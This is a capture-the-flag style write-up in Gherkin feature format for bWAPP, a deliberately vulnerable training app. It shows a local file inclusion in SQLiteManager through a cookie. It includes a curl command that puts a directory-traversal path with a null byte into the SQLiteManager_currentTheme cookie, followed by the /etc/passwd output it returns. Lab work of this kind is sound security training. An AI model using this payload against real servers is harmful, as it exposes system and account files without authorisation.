# language: en

Feature: SQLiteManager LFI
  From the bWAPP system
  Of the category A9: Using Known Vulnerable Components
  With low security level
  As the registered user disassembly

  Background:
    Given I'm on macOS High Sierra 10.13.6 (17G65)
    And running bee-box v1.6 on Oracle VM VirtualBox Manager 5.2.16
    And using Safari Version 11.1.2 (13605.3.8)
    And working with curl 7.54.0 (x86_64-apple-darwin17.0)
    Given the following scenario
    """
    URN: /lfi_sqlitemanager.php
    Message: SQLiteManager Local File Inclusion
    Details:
      - Message with a link to the SQLiteManager site
      - Link to the vulnerability reference
    Objective: Use the cookie SQLiteManager_currentTheme to do a LFI
    """

  Scenario: Do a LFI to read the content of /etc/passwd
    Given I use the Safari web inspector to see the request cookies
    """
    Cookie: PHPSESSID=c3fe45c0aeeddbeced503ba7a74d50f1;
            security_level=0; SQLiteManager_currentLangue=2;
            SQLiteManager_currentTheme=green
    """
    When I make a request with curl using those cookies
    But change SQLiteManager_currentTheme trying to reach /etc/passwd
    """
    $ path="../../../../../../../../../../../../../etc/passwd%00"
    $ curl -b "PHPSESSID=c3fe45c0aeeddbeced503ba7a74d50f1; security_level=0;
    SQLiteManager_currentTheme=$path; SQLiteManager_currentLangue=deleted" \
    http://192.168.1.18/sqlite/
    """
    Then it shows me the contents of passwd
    """
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    ...
    neo:x:1001:1001::/home/neo:/bin/sh
    alice:x:1002:1002::/home/alice:/bin/sh
    thor:x:1003:1003::/home/thor:/bin/sh
    wolverine:x:1004:1004::/home/wolverine:/bin/sh
    johnny:x:1005:1005::/home/johnny:/bin/sh
    selene:x:1006:1006::/home/selene:/bin/sh
    postfix:x:117:129::/var/spool/postfix:/bin/false
    proftpd:x:118:65534::/var/run/proftpd:/bin/false
    ftp:x:119:65534::/home/ftp:/bin/false
    snmp:x:120:65534::/var/lib/snmp:/bin/false
    ntp:x:121:131::/home/ntp:/bin/false
    """
